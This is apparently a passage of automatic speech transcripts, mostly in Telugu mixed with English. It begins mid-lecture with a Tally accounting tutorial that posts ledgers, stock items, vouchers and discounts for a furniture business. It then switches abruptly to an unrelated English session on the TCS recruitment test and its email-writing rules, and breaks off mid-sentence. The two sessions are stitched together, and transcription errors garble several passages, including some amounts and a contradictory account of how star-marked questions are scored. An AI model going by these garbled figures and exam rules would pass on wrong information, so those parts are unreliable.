పర్సన్, డోంట్ సీ ద పర్సన్ హూ ఈస్ టేకింగ్ ద అమౌంట్, జస్ట్ సీ ద పర్పస్. అంటే మీరు ఎవరికి పే చేస్తున్నది ఇంపార్టెంట్ కాదు, దేని గురించి పే చేస్తున్నాం అనేది ఇంపార్టెంట్. సో ఆ అకౌంట్ని దాని గురించి డెబిట్ చేస్తాం కాబట్టి మనం ఆ అకౌంట్ క్రియేట్ చేసుకోవాలి. నెక్స్ట్ paid cash towards purchase of computer with Tally software. So I am creating as computer, fixed asset. Next is paid cash towards furniture work. So furniture under fixed asset. Check received towards loan from Shriram Chit Funds. Shriram Chit Fund loan. So it's an loans liability. Loans and advance undi. ఇది ఎప్పుడు యూజ్ చేస్తాము అంటే వెన్ వీఆర్ గివింగ్ లోన్ టు అదర్ పర్సన్. మనం వేరే వారికి లోన్ ఇచ్చినప్పుడు ఈ లోన్స్ అండ్ అడ్వాన్స్ అసెట్ సెలెక్ట్ చేసుకుంటాం మనం వేరే. ఓకే, నెక్స్ట్ క్యాష్ పే టువర్డ్స్ స్టేషనరీ.
under indirect expense for the month. So, create purchase under purchase account. Next, ఎవరి దగ్గర నుంచి కొన్నాము, గోద్రేజ్ అండర్ సన్డ్రీ క్రెడిటార్స్, ఎవరి దగ్గర నుంచి కొంటామో క్రెడిటార్స్, ఎవరికైతే అమ్ముతామో డెటార్స్. నెక్స్ట్, బాంటియా ఫర్నిచర్ అండర్ సన్డ్రీ క్రెడిటార్స్. నెక్స్ట్, రాజ్ ఫర్నిచర్స్ under sundry creditors. Okay, now this is completed. Now go for the next one, sales for the month. So, create sales under sales account. Next, Z solutions under sundry debtors, because we are selling to the party. Cash account, there is no need to create cash account because already cash account will be available in Tally. Next one is RRD College under sundry debtors. Right. Next, pay transportation towards transportation on purchases. So, create transportation on purchase under direct expenses. Next, cash paid towards transportation on sales. So, are indirect expenses. Next, purchase already we done. On sales, transportation on sales done. Check issued to Bantia Furniture, Bantia Furniture is done, and balance is discount received. Okay, so create discount received under purchase, transportation on sales. Check received from RD College and balance is discount. Okay, so check receive చేసుకుంటే డిస్కౌంట్ అలౌడ్ అవుతుంది. చెక్ పేడ్ చేస్తే, చెక్ వరకు ఇష్యూ చేస్తే మనకది రైట్. నెక్స్ట్, అగైన్ check issued to Godrej, with Godrej account is done. Check issued to Raj Furniture, this is done. Okay, cash paid towards salaries. Okay, tea and snacks. So, tea and snacks are treated as staff welfare under indirect expenses. Next, cash paid towards newspaper. So, newspaper bill you can accept as newspaper, or you can take it as books and periodicals. Okay, under indirect expenses. Okay, right. Creation of company, creation of ledger accounts. Okay, creation of company, creation of ledger accounts, creation of inventory, and voucher entry, and what you say, reports. So, we have created the first two steps, that is creation of that problem, that paid for tea and snacks. సో ఇప్పుడు టీ అండ్ స్నాక్స్ అని ఉందనుకోండి, మీరు టీ అంటే టీ తెప్పించినప్పుడు టీ ఎక్స్పెన్సెస్ అని, స్నాక్స్ తెప్పించినప్పుడు స్నాక్స్ ఎక్స్పెన్సెస్ అని, లంచ్ వచ్చినప్పుడు లంచ్ ఎక్స్పెన్సెస్ అని, సమ్ అలా డిన్నర్ చేయించినప్పుడు ఏమైనా ఎవరికైనా కస్టమర్స్కి, సారీ మన ఎంప్లాయీస్కి కానీ ఇంకా ఎవరికి కానీ డిన్నర్ ఎక్స్పెన్సెస్. దర్ ఈస్ నో నీడ్ టు క్రియేట్ డిఫరెంట్ ఎక్స్పెన్సెస్. జస్ట్ సో వాట్ ఎవర్ యు ఆర్ స్పెండింగ్ ఫర్ వెల్ఫేర్ ఆఫ్ ద స్టాఫ్, సో వాళ్ళకి టీ, స్నాక్స్, టిఫిన్స్, మీల్స్ అలాంటివి ఏవి చేసినా, దట్ ఆల్ ఎక్స్పెండిచర్ విల్ కమ్ అండర్ స్టాఫ్ వెల్ఫేర్ అనమాట. ఓకే, అలాగే ఫర్ ఎగ్జాంపుల్ ఎరైజర్స్ లైక్ దట్. సో దిస్ ఆల్ బిలాంగ్ టు స్టేషనరీ. సో ఇన్స్టెడ్ ఆఫ్ మెయింటైనింగ్ పెన్ అకౌంట్, పెన్సిల్ అకౌంట్, ఎరేజర్ అకౌంట్, షార్ప్నర్ అకౌంట్, పెన్ books account, papers account, there is no need to create. So this all belongs to stationery. So you have to put in stationery account. So alage manamu monthly, weekly. So for that also there is no need to go for newspaper, something newspaper ani, okay, magazine konte magazine account ani, inka atla newspaper ala separate account create chese avasaram ledhu. There is a head called books and periodicals. So whatever you are spending on that books and magazines and all, you have to create one books and periodical account, okay, and you have to put in that account. Okay, so like this, for example, repairs and maintenance undi manaki. So manaki repairs and maintenance, for example, computer manaki emanna repair vastundi.
సో మనం టెక్నీషియన్తో రిపేర్ చేస్తాం, ఒక 1000 రూపీస్ 500 పే చేస్తాం. అలాగే చిన్న మెషినరీ ఏదో పాడవుతుంది, దానికి మనము ఏదో చిన్న పార్ట్ తెచ్చేసి ఒక 1500 సంథింగ్ పార్ట్ తెచ్చి రిపేరింగ్ చేస్తూ ఉంటాం. సో అలాగే ఆ టెక్నీషియన్కి అమౌంట్ పే చేస్తాం. సాలరీస్ టు మిస్టర్ ఎక్స్. సో డోంట్ రికార్డ్ మిస్టర్ ఎక్స్ అకౌంట్. సో రికార్డ్ ఫర్ వాట్ పర్పస్ యు ఆర్ పేయింగ్ ద అమౌంట్, అంటే దేని గురించి పే చేస్తాం. సో ఇందాక మనం చూస్తే క్యాష్ చేస్తే మనకి నరసింహ అకౌంట్ మన డెబిట్లో క్రెడిట్లో కానీ కనబడుతుంది, అంటే మనకు ఆయనకి డబ్బులు ఇచ్చేది ఉంది అన్నట్టు కనబడుతుంది. సో యాక్చువల్లీ ఇట్స్ అండ్ డిపాజిట్ అకౌంట్, ఇట్స్ అన్ అసెట్ అకౌంట్, రైట్. సో అందుకని ఏ పర్పస్కి ఇచ్చాము అనేది ఇంపార్టెంట్, ఆ పర్పస్ పైన మన అకౌంట్ క్రియేట్ చేసి చేయాలి, రైట్. సో నౌ సీ ద థర్డ్ స్టెప్, హౌ టు క్రియేట్ ద ఇన్వెంటరీ. సో ప్లీజ్ సీ ద స్క్రీన్ నౌ. సో సీ ద స్క్రీన్. Okay, so the next is inventory info. So stock item create cheyalem, first man units of measures create chestam. So create units of measures. Okay, units of measures ikkada manaki table, almaras, chairs, tables unnadu. So this are we are going to sell in item. Okay, so stock items create almara. Okay, units numbers. తర్వాత చైర్స్ numbers. Okay, so if I want for FIFO, I can go for FIFO method. I am going for FIFO. Okay, so ఇప్పుడు ఇదే స్క్రీన్లో ఉండి మీరు మిగతా ఏమైనా ఆల్టర్ చేయాలని పడుతుంది. ఓకేనా, దట్ ఈస్ వన్ ఆఫ్ ద షార్ట్ కట్ కీ. నెక్స్ట్ వన్ ఈస్ టేబుల్స్, numbers, FIFO method. Okay, next sofa set, numbers, FIFO. Center table, sorry malli table marchipoyanu. Center table, FIFO. Next one, FIFO. Bookshelves, numbers, FIFO. Next, writing table, FIFO. Next, writing patches, okay, right. So first we have done with the inventory also. Now the fourth step is accounting vouchers. So go for accounting vouchers. So what is the first one? Vijay and Vinay started partnership business with 2,50,000 each, and iddaru 2,50,000 investment bettaru. So iddaru paina receipt raaskovali kada manamu. So cash is coming in, F6 receipt, cash, Vinay capital, again cash, Vijay capital 2,50,000. Next, deposit is increasing, cash account is decreasing. What? How much we are depositing? 2,50,000. Next is, okay, 34,500. Okay, if you want you can write words rent deposit. Next one, chase. What is the amount? 35,000. Okay, payment పోతుంది. So cash, furniture is a fixed asset. So selecting furniture, work 25,000. See, suppose 3,50,000 ఫర్ ఎగ్జాంపుల్ ఇచ్చాను అనుకోండి. ఇక్కడ మీరు అబ్జర్వ్ చేసినట్టయితే క్యాష్ డెట్ బ్యాలెన్స్లో కనబడుతుంది. క్యాష్ డెట్ బ్యాలెన్స్లో ఎందుకు కనబడుతుంది? బికాస్ we don't have cash but we are paying it, so that is why it is showing as red color. Okay,
2 lakhs. So actually we have paid 25,000. If you observe now, it is 1,55,500 is debit balance. So like that you can have current balance. So what is only అంటే unnecessary మీరు ఎక్కువ క్యాష్ ఏమైనా పే చేస్తున్నారా ఏంటి అనేది. ఓకే, సో చెక్ రిసీవ్డ్ టువర్డ్స్ లోన్ ఫ్రమ్ శ్రీరామ్ చిట్ ఫండ్. చెక్ రిసీవ్డ్, we are receiving, so go for F6. So check, so Canara Bank, okay, from Sriram Chit Fund loans, select Sriram Chit Fund loans. How much amount is 5 lakhs. Okay, so here if you are transferring cash, check, how we are doing it, you can write instrument number is nothing but check number. Okay, so paid, FI, payment, cash, stationery, okay, 5,000. Okay, okay, ఇక డేట్ రిఫరెన్స్ నెంబర్ ఉంది. ఓకే, ఎవరి దంచులు కొన్నాము, ఏం ఐటమ్ కొన్నాము, క్వాంటిటీ ఎంత, రేట్ ఎంత, అమౌంట్ ఎంత. సో ఎవ్రీథింగ్ ఈజ్ హియర్. ఓకే, నౌ వీఆర్ గోయింగ్ టు డూ దిస్ పర్చేజ్. రైట్, సో సింపుల్ F9 పర్చేజ్. సో రిఫరెన్స్ నెంబర్ ఉంది, రిఫరెన్స్ నెంబర్ నథింగ్ బట్ పార్టీ సప్లై ఇన్వాయిస్. అంటే మనం పర్చేజ్ చేసినప్పుడు బిల్ నెంబర్ ఉంటుంది కదా, ఆ బిల్ నెంబర్ ఇక్కడ ఇవ్వాలన్నమాట. సో ఎంత బిల్ నెంబర్ 50, డేట్ 1st April. ఓకే, సో ప్లీజ్ స్టూడెంట్స్ ఇక్కడ కొంచెం జాగ్రత్త ఓకే, ఇక్కడ ఏదైతే మీకు డేట్ కనపడుతుందో అది బిల్ డేట్ అనమాట. సో ఈ రెండు ఎందుకు ఇచ్చాడు అంటే, ఇదేమో మనం ఏ రోజు ఎంట్రీ చేస్తున్నామో, ఫర్ ఎగ్జాంపుల్ మనము ఒక డిఫరెంట్ డిస్టిక్, ఒక వేరే డిస్టిక్ నుండి కానీ వేరే స్టేట్ నుండి కానీ మనం పర్చేస్ చేసాము. ఓకే, సపోజ్ వీఆర్ గెట్టింగ్ మెటీరియల్ ఫ్రమ్ బెంగళూరు. ఓకే, సో బెంగళూరులో ఒకటే రోజులో రీచ్ అవ్వవు కదా మన స్టాక్. సో బెంగళూరుకు 2 days, మ్యాక్సిమం 2 days or మ్యాక్సిమం 3 days స్టాక్ రీచ్ అవుతుంది. సో తను ఏ రోజు చేస్తాడు, మనం ఏదైతే ఆర్డర్ పెట్టామో ఆ ఆర్డర్ని బేస్ చేసుకొని ఆ రోజు డిస్పాచ్ చేస్తాడు. అంటే సపోజ్ he is dispatching material on 1st April, but we will receive stock on 3rd April, right? సో మనం ఎప్పుడు ఎంట్రీ చేస్తాము, 3rd April రోజు ఎంట్రీ చేస్తాం. సో 3rd April ఇక్కడ ఉంటుంది, బట్ బిల్ ఏ రోజు చేశాడు తను, 1st Aprilకి చేస్తాడు. సో ఆల్రెడీ ఎంట్రీ డేట్ కన్నా ఇది ముందు ఉండాలి, ఎంట్రీ డేట్ కన్నా తర్వాత ఉంటే తీసుకోదు. అంటే ఎంట్రీ డేట్ ఏప్రిల్ ఉండి బిల్ డేట్ 2nd April ఎట్లా ఉంటుంది, ఛాన్స్ లేదు కదా. అంటే మనం ఎంట్రీ చేస్తుందేమో 1st April, కానీ బిల్ డేట్ ఏమో 1st April కన్నా ముందు ఉంటుంది, కానీ 1st April తర్వాత ఉండదు. అంతేనా? ఫర్ ఎగ్జాంపుల్ ఐఎమ్ టేకింగ్ ఎస్ టు 2nd April, సి it is not taking, the screen is not accepted. I am taking on 1st April, it is accepting. I am taking on 31st March also it is accepting. 31st March 18 it is accepting, because మన ఎంట్రీ డేట్ ఏమో 1st April ఉంది, కానీ బిల్ డేట్ ఏమో 31st March ఉంది. ఇట్ ఈస్ పాసిబుల్. అంటే 31st రోజు తను మనకి మెటీరియల్ పంపించాడు, మనం దాన్ని 1st Aprilకి ఎంట్రీ చేసాం. ఇట్ ఈస్ పాసిబుల్. కానీ ఇలా పాసిబుల్ ఉంటుందా మనకేమన్నా? ఏప్రిల్లోనేమో మనము మెటీరియల్ తెచ్చుకొని 2nd Aprilకి బిల్లింగ్ చేయడానికి పాసిబిలిటీ ఉండదు కదా. సో అందు గురించి ఈ రెండు ఇచ్చాడు అనమాట. సో ద రైట్ కార్నర్ వాట్ ఎవర్ సీయింగ్ హియర్, దట్ ఈస్ ఎంట్రీ గోద్రేజ్. సెలెక్ట్ గోద్రేజ్. సో ఇక్కడ డీటెయిల్స్ అన్నీ ఇస్తామంట. ఆర్డర్ ఏమైనా ఆర్డర్ ఉంటే ఆర్డర్ రిఫరెన్స్ నెంబర్, ఓకే, సప్లై అడ్రసెస్. మీరు గోద్రేజ్కి ఆల్రెడీ సప్లై ఆర్డర్ ఇచ్చి ఉంటే ఆర్డర్ ఆటోమేటిక్గా అడ్రస్ అన్నీ వచ్చేస్తుంది అనమాట ఇక్కడ. ఓకే, పర్చేజ్ అకౌంట్, పర్చేజ్, నేమ్ ఆఫ్ ద ఐటమ్, వాట్ ఎవర్ పర్చేసింగ్, అల్మారా. ఓకే, సో ఇక్కడ ట్రాకింగ్ నెంబర్ ఏమైనా వస్తే నాట్ అప్లికబుల్ అని పెట్టేసండి. నాట్ అప్లికబుల్. క్వాంటిటీ, వాట్ ఈస్ ద క్వాంటిటీ ఇస్ 10. ఓకే, వాట్ ఈస్ 2500. ఓకే, రైట్. సో ఇంకొకటి మళ్ళీ నెక్స్ట్ ఐటమ్ ఉంది, అల్మారా, చైర్స్ ఉంది. ఇప్పుడు చైర్స్ అని కొట్టాగానే నాకు ఇంకో స్క్రీన్లోకి వెళ్తుంది. ఈ స్క్రీన్ ఎందుకు వెళ్తుంది? ట్రాకింగ్ నెంబర్ అని ఎందుకు ఉంది? ఇవన్నీ ఎందుకు వస్తున్నాయంటే ఇక్కడ F11 ఫీచర్స్లో F11 ఫీచర్ మనకి సేల్స్ ఆర్డర్స్, పర్చేజ్ ఆర్డర్స్ అనేది ఎస్ ఉంది. ఆ సేల్స్ ఆర్డర్స్, పర్చేజ్ ఆర్డర్ ఉన్నప్పుడు కంపల్సరీ ఆర్డర్ అగెనెస్ట్గా మనకు వస్తుంది కాబట్టి అది మనకి ఆర్డర్ అడుగుతుంది అనమాట. సో టాలీ విల్ బీ ఆస్కింగ్ ఫర్ ఆర్డర్ డీటెయిల్స్ because you have activated here orders. So against that order you are getting the material. So that is the reason whenever you are selecting the item, it is asking for order. See, now I have deactivated that order. So rightly now you can see that the cursor is going to quantity and rate column, right? Chairs.
క్వాంటిటీ సెలెక్ట్ చేసుకుంటామో క్వాంటిటీ సెలెక్ట్ చేసుకోగానే అది ఇంకొక స్క్రీన్లోకి వెళ్ళేసి అది ఏ ఆర్డర్ అగెనెస్ట్గా వచ్చిందని డీటెయిల్స్ అడిగింది. ఎందుకు అడిగింది అంటే మనము ఏం చేస్తాము, ఇక్కడ ఆర్డర్ డీటెయిల్స్ యాక్టివేట్ చేసాం కాబట్టి అడుగుతుంది. ఇప్పుడు దాన్ని డీయాక్టివేట్ చేశాను నేను. సో ఆ సేల్స్ ఆర్డర్ పర్చేస్ ఆర్డర్ మన సపరేట్ క్లాస్ ఉంటుంది, అక్కడ మనం డిస్కస్ చేసాం వీటి గురించి. ఓకేనా. టేబుల్స్ మన ట్రాన్స్పోర్టేషన్ పర్చేసెస్ సేల్స్ అవి ఉంటే కూడా యాడ్ చేసుకోవచ్చు లేదా సపరేట్గా చేసుకోవచ్చు. సో ద అడిషనల్ ఎక్స్పెన్సెస్ ఆన్ యువర్ ఇన్వాయిసెస్ సేల్స్ అండ్ పర్చేసెస్ ఆల్సో వీ హ్యావ్ సపరేట్ క్లాస్ ఫర్ దట్, we are going to see on that. Okay, if you want you can write been goods purchased from Godrej. Okay na, bill number wide bill number, okay, something rasi. Okay, this is first. Second one is Bantia furniture, reference number is 105. So reference number is 105, party name is Bantia furniture. At center table, the next item is center table 10 2500. Okay, the third one is display table 5 3500, 67500. Next 98 part bookshelf, quantity is 15 3500. Again writing table, quantity is 100 500, sorry 500 250 300, 250 300. So 1,77,500. Okay, so now sales is completed, purchase is completed, sorry purchase is completed. Now we are going to have the sales also. Sales he is giving, so reference number 1 means 1 invoice ante reference number 1. So if I go to F8 sales, reference number is 1. Okay, oka reference number undante adi oka invoice ani ardam anamata. So party name is cash. Okay, if you write here you can have the party name, Mr. Kumar, you can write Kumar account. Okay, sales, name of the item almara. Okay, quantity ఎన్ని కొన్నాడు 2, రేట్ ఎంత 3750, right, katam. Sorry, this is right. Now invoice number 1 is complete. Now invoice number 2. Okay, invoice number 2, party name is cash. Okay, item whatever, next is cash, sorry, tarvata table ammamu, table any 5 6250. Okay, next Z solutions, select the party name Z solutions. ఏమేమి అమ్మాము Z solutions కి అల్మారా అమ్మాము 5 3500, మళ్ళీ చైర్స్ 50 350, టేబుల్ 5. సో ఇప్పుడు అబ్జర్వ్ చేస్తే 6250 ఆటోమేటిక్ ఎందుకు వచ్చింది, చైర్ని టేబుల్ని ఓకే టేబుల్ని 6250కి అమ్మాము. సో అందుకని లాస్ట్ ప్రైస్ 6250 ఉంది కాబట్టి ఆటోమేటెడ్ టైల్లో 6250 వచ్చేస్తుంది అనమాట. సో 60. నెక్స్ట్ వన్ ఈస్ అగైన్ పార్టీ నేమ్ క్యాష్, త్రీ 6500, center table 8 4000, display table 3 5000, 66,500. Okay, right. So we have done with sales. ఏమమ్మా ఆల్రెడీ కాలేజ్కి బుక్ షెల్ఫ్ 14 అమ్మాము 475. రేట్ రాలేదు ఎందుకంటే అంతకుముందు మనం ఏం అమ్మలేదు కాబట్టి రేట్ రాలేదు. రైటింగ్ ప్యాడ్ చైర్స్ 225 225 450,
నెక్స్ట్ చైర్స్ 150, 350 వచ్చింది ఎందుకంటే ఆల్రెడీ ఆ రేట్ కమ్మాం కాబట్టి. నెక్స్ట్ టేబుల్స్ 6,000, so 3,78,000, right? So 3,78,000 we have done. This is your invoice, right? సో మళ్ళీ ఇదే మీకు ప్రింట్ కావాలంటే సో ప్రీవియస్ ఏమైనా కావాలంటే పేజ్ అప్ కొడితే వచ్చేస్తుంది. సో ఆల్ట్ పీ కొడితే విత్ ప్రీవ్యూ అని సెలెక్ట్ చేసుకోండి. ఇన్వాయిస్ జనరేటర్ ఫర్ టాలీ ఫార్మాట్. సో ఇది జస్ట్ మీకు మా నార్మల్గా చూపించే ఫార్మాట్. ఇందులో అడిషనల్గా జిఎస్టీ వచ్చినప్పుడు ఇంకా మీకు ఇంకా చాలా బాగా అర్థమవుతుంది ఎందుకంటే దిస్ ఇస్ ద ఇన్వాయిస్ వితౌట్ జిఎస్టీ. నౌ వీ హ్యావ్ టు మేక్ ద ఇన్వాయిస్ విత్ జిఎస్టీ. ఆ జిఎస్టీలో మళ్ళీ అడిషనల్ ఛార్జెస్ ఉంటే ఎలా చేయాలి, రేట్ కాలం కావాలంటే ఏం చేయాలి, బ్యాంక్ కాలమ్స్ కానీ. సో ఇవన్నీ మనము ఇంకా పర్టికులర్ ఫర్దర్ క్లాసెస్లో ఇన్ డెప్త్. ద నెక్స్ట్ వన్ ఈస్ cash paid toward transportation and purchase paid. Okay, FI payment, cash, transportation on purchases, transport and purchases anta 2,500 khatam అయిపోయింది. నెక్స్ట్ ట్రాన్స్పోర్టేషన్ ఆన్ సేల్స్ 1,500, cash on sales amount is 1,500. okay, next one check received from Z solution F6 చెక్ అన్నాడు. సో కెనరా బ్యాంక్ సెలెక్ట్ చేసుకున్నాము. ఓకే, జీ సొల్యూషన్స్ ఎంత ఇచ్చాడు, 65,000 ఇచ్చాడు. ఓకే, సో అగైన్స్ డిఫరెన్స్ వస్తే సెలెక్ట్ చేసుకోండి. ఓకే, సో స్టూడెంట్స్ మీకు అగైన్స్. ఓకే, సో ఈ అగైన్స్ డిఫరెన్స్, ఈ అడ్వాన్స్, ఇవన్నీ మనకి బిల్స్ పేయబుల్ రిసీవబుల్స్ క్లాస్ ఉంటుంది, దానిలో మనం చెక్ చేస్తాం. ఓకేనా, ఎఫ్ఐ క్యాష్ పే టువర్డ్స్ transportation on purchases, transportation on purchase 3,500. మళ్ళీ క్యాష్ పెట్టి ట్రాన్స్పోర్టేషన్ ఆన్ సేల్స్ 1,900. ఇక్కడ ఇది జాగ్రత్త వినండి. చెక్ ఇష్యూ టు బాంటియా ఫర్నిచర్ 65,000, బ్యాలెన్స్ డిస్కౌంట్ రిసీవ్డ్. సో బ్యాలెన్స్ అంటే బాంటియా, చెక్ ఇష్యూ టు బాంటియా ఫర్నిచర్. సో యాక్చువల్లీ బాంటియా ఫర్నిచర్కి మనం ఎంత పే చేయాలి, బాంటియా ఫర్నిచర్ వీ హ్యావ్ టు పే 67,500. కానీ మనం ఇక్కడ ఎంత పే చేస్తున్నాము, 65,000 పే చేస్తున్నాము. అంటే ఇంకా బ్యాలెన్స్ 2,500 ఇస్ డిస్కౌంట్ రిసీవ్డ్. డిస్కౌంట్ ఈస్ అన్ అడ్జస్ట్మెంట్ ఎంట్రీ, రైట్? సో వీ హ్యావ్ టు గో ఫర్ F7 journal. Okay, what is debit? Debit is Bantia furniture 2,500. Okay, credit is what? Discount received 2,500. Been discount received. Okay, right? Cash paid to transportation purchases 2,000. Okay, but transportation on sales amount and the transportation on sales 1,000. Next, check received from RRD college. Okay, F6 receipt, Canara Bank, RRD college. సో 3 lakh RRD కాలేజ్ నుంచి ఎంత రావాలి, యాక్చువల్గా మనకి RRD కాలేజ్ 3,78,000 రావాలి, బట్ 3 lakhs మనకి వచ్చింది, 3,70,000 వచ్చింది, ఇంకా 8,000 ఇస్ డిస్కౌంట్. సో 3 డిస్కౌంట్ F7 జర్నల్. ఓకే, హియర్ RRD కాలేజ్ ఇస్ షుడ్ బి డిస్కౌంట్ అలౌడ్ షుడ్ బి డెబిటెడ్. ఓకే, నెక్స్ట్ check issued to Godrej, nothing adjustment, FI payment, Canara Bank, check issued to Godrej enta. Next, check issued to Raj Furniture, balance discount, Raj Furniture check issued annam, Canara Bank. Okay, Raj Furniture. So మొత్తం యాక్చువల్ రాజ్ ఫర్నిచర్కి ఇందాక మనం ఏం చేసాం, 1,75,000 ఒక ఎంట్రీ వేసి డిస్కౌంట్ ఇంకొక ఎంట్రీ చేస్తాం. సో అలా కాకుండా కూడా మనం అంటే ఫర్ ఎగ్జాంపుల్ 1 lakhs అండి, ఇప్పుడు ఇదే ఇన్వాయిస్ చూస్తున్నట్టయితే రాజ్ ఫర్నిచర్కి మనం ఎంత పే చేయాలి,
1,77,500 దానికి 1,75,000 పే చేస్తారు. అంటే ఆ బిల్ సెటిల్మెంట్ కంప్లీట్గా అయిపోయింది. సో అలాంటి అప్పుడు మాత్రమే పే మనకి ఇక్కడ ఏమవుతుంది డిస్కౌంట్ పే చేస్తాం. సారీ వీఆర్ పేయింగ్ హిమ్, సో విల్ రిసీవ్ ద డిస్కౌంట్ రైట్. సో డిస్కౌంట్ రిసీవ్డ్ అని సెలెక్ట్. సో ఈ విధంగా మీరు పోస్ట్ అంటే ఒకటే ఎంట్రీలు ఇలా కూడా చేయొచ్చు అనమాట. బట్ ఇది అంటే ఒక డిస్కౌంట్ ఎంట్రీ పేమెంట్ ఎంట్రీ ఒకటే దానిలో పోస్ట్ చేయాలి అంటే ఆ టోటల్ బిల్ సెటిల్మెంట్ ఉండాలి. అంటే టోటల్ ఇన్వాయిస్ 1,77,500 దానిలో 2,500 డిస్కౌంట్. సో టోటల్ ఉంది కాబట్టి పోస్ట్ చేయడానికి ఛాన్స్ ఉంటుంది. మీరు సపరేట్గా ఉన్నప్పుడు అంటే చేసే కొంచెం కన్ఫ్యూజన్ ఉంటుంది. ఓకే, అండ్ ఈస్ ఫుల్. ఓకే, paid for salaries, cash salaries amount 10,000. Okay, next here 2,500. Next 2,50,000. Sorry, 2,50,000. Okay, next cash paid towards daily newspaper. Cash daily newspaper books and periodicals and create చేసాము. So 150 is the amount. Okay, so gross profit 1,50,500. You can see the net profit 125. In balance sheet, come to balance sheet, press Alt F1 for full details. Here also you can see, okay, cash in hands. Okay, bank account, cash account. So cash account balance ఎక్కువ ఎందుకు వచ్చింది something. So already college I have done with the cash balance. Cash in hand is 236,700, 236,700. Bank account. This is the things we have done, right? Students, we have seen business అనమాట. తన బిజినెస్లో నుండి మనం ఏమైతే చేసామంటే తన బిజినెస్లో ఫర్నిచర్స్ అమ్ముతాడు. సో ఫర్నిచర్ బిజినెస్ నథింగ్ బట్ చైర్స్ టేబుల్స్ ఇవన్నీ మనకి ఫర్నిచర్స్ సంబంధించినవి. ఆ బిజినెస్ ఒక ప్రాబ్లం తీసుకున్నాము. ఇందులో మీకు మన ఇన్వెంటరీ చేసాము. ఓకేనా, అలా ఒక సింపుల్ మోడల్ సేల్స్ ఇన్వాయిస్ కూడా చూపించాను మీకు ఎలా ఉంటుంది ప్రివ్యూ అనేది. ఓకే, సో బ్యాలెన్స్ షీట్లో మనకి ఏవైతే ఆన్సర్స్ ఇచ్చాడో ఆ ట్రాన్సాక్షన్లో డిస్కౌంట్ కూడా ఉంటే డిఫరెంట్గా ఎలా చేయాలి అంటే పేమెంట్ సపరేట్గా డిస్కౌంట్ సపరేట్గా ఎలా పాస్ చేయాలి త్రూ జర్నల్ వాచర్ అది చూపించాను. అలాగే ఇప్పుడు 2 ఎంట్రీస్ పాస్ చేసే బదులు మనకి అంటే అనవసరంగా ఒక వోచర్ టైం వేస్ట్ వోచర్ ఎంట్రీ చేయాలి. ఓకేనా, సో దాన్ని మళ్ళీ ప్రింట్ తీయాలి. సో టు సేవ్ ద స్టేషనరీ, టు సేవ్ ద టైమ్ వర్క్, సో హౌ టు డూ the payment and discount entry or receipt or discount entry in one invoice also, in one voucher also I have showed you. So మీరు అప్పుడప్పుడు అబ్జర్వ్ చేసి ఉండాలి. రాసి ఉంటే అమౌంట్ ఇంత మైనస్ డిస్కౌంట్ అని రాసేసి మనకి పేమెంట్ చేస్తాం. సో అదే విధంగా మన వోచర్లో కూడా చేయొచ్చు. బట్ ఇది ఎప్పుడు యూస్ చేస్తామంటే ద సెటిల్మెంట్ షుడ్ బి ఫుల్. అంటే ఇప్పుడు 1 lakh బిల్ అమౌంట్ 1 lakh ఉంది. ఆ 1 lakhకి 95,000 వచ్చింది, 5,000 ఇంకా మొత్తం డిస్కౌంట్ అని కరెక్ట్గా తెలిసినప్పుడు మనం పాస్ చేయొచ్చు ఎంట్రీ. సో ఒకసారి ఈ 1 lakhకి ఒకసారి 20,000 ఇచ్చి ఒకసారి 30,000 ఇచ్చి అట్లా అయినప్పుడు కొంచెం చేయడం కొంచెం కష్టం అవుతుంది. సో ట్రాకింగ్ విల్ బి డిఫికల్ట్. సో అందుకే అలాంటి సిచ్యుయేషన్ అంటే ఒకటే బిల్ అప్పుడే పేమెంట్ ఇచ్చేస్తేనేమో ఒకటే వోచర్లో చేయొచ్చు. బట్ ఆ 1 lakh బిల్నే ఒకసారి 30,000 ఇచ్చి ఒకసారి 25,000 ఇచ్చి ఒకటి పార్ట్లో పేమెంట్ ఇచ్చినప్పుడు మీరు కొంచెం డిస్కౌంట్ చేయడం ప్రాబ్లం అవుతుంది. సో ఇన్ దట్ సిచ్యుయేషన్ ప్లీజ్ డోంట్ గో ఫర్ ద సింగిల్ వోచర్. ఓకే, యూ క్యాన్ గో ఫర్ జనరల్ వోచర్. So in today's class we have seen all these types of solutions with inventory. Okay, in tomorrow's class we are going to see some other classes like how to make the sales invoices, sales orders, purchase orders, etc. Okay, after completing some reports we are going to complete in the next class. Hello everyone, welcome to today's session for TCS pattern. We are continuing to talk about the TCS selection process. Like I had been repeating certain cities and districts in AP. So the selection process is divided into 2 stages. The first stage is the online written assessment in order to go to the interview segment or interview stage.
So interview stage will have two segments, one is HR interview and one is technical round, and the online assessment will have 4 different categories. These categories are, there is an email which you need to write, then there is quantitative aptitude, which is a multiple choice question. You will have 20 questions that needs to be answered in 40 minutes. You will have multiple choice question for C program language, 10 such questions with a time limit of 20 minutes. And then you will have a coding test. You need to write a code based on the question, according to the question. Only one such program you need to write with a permitted time being 20 minutes. The extreme right column says number of star mark questions. In quantitative aptitude, you will have 2 questions which will be marked as star. What it means is 0.33% of the marks allocated for that particular question. However, the star mark questions, the points, the negative, but the positive aspect is if you answer this question correctly, you will also score double the points, which is the negative marking. So you got to be very careful for these 2 questions. The topics that will be ratios and proportions, allegations or mixtures, series and progression, average, percentage profit. Now as far as email is concerned, your email question will look something like this. This is in terms of a scenario, and you need to write an email keeping in mind the outline. The outline basically means the keywords that needs to be used in the entire email. There are certain rules. For example, all the keywords has to be used in the email. The format of the keyword cannot change, which means the first keyword you have here is housing loan. It cannot be house loan. Account cannot be accounting. Okay. There will be certain other rules which will be mentioned on the email itself. For example, in your email, you can add other sentences of your choice. The name of the sender and receiver should be as given. Every Kumar, who is the bank manager of Andhra Bank. The sender's name is Anil. So you need to maintain this. You cannot go wrong with that. The email must contain a minimum of 50 words. If you use below number of 50 words, you will be disqualified. It should be over and above the number of words. That's why it says minimum. The outline is, if the outline is strictly not followed, which means if you miss any of the keyword, if you make any spelling mistake, together a list of do's and don'ts for the email. So let's go through this. Read the topic carefully. Read and understand the key. One of the keyword or phrases, the email will be invalid. Ensure the keywords are used in the same form as mentioned in the topic, which means buy cannot be changed into bought. Keywords should be mentioned in the sequence as mentioned in the topic. Start a new paragraph for change of a thought group, and every new paragraph should start with a fresh line. Next set of do's, entire email should be left indent. Do not leave a gap on the left when you start a new paragraph. Use the receiver's name and the sender's name as mentioned in the topic. Always end your email with salutation and start your email with greeting. Use a hello or dear or respected. Email is written within 10 minutes. Now this is important. The time limit is 10 minutes. If you submit the email at the 10th minute mark, you may not be able to submit. If you exceed the 10 